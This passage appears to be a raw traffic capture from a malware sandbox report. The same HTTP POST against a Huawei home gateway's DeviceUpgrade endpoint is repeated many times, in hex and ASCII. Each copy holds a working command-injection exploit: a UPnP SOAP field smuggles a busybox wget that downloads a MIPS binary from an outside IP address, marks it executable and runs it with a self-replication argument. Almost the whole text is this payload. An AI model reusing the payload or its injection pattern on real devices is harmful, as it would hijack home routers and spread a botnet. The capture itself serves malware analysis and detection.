62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 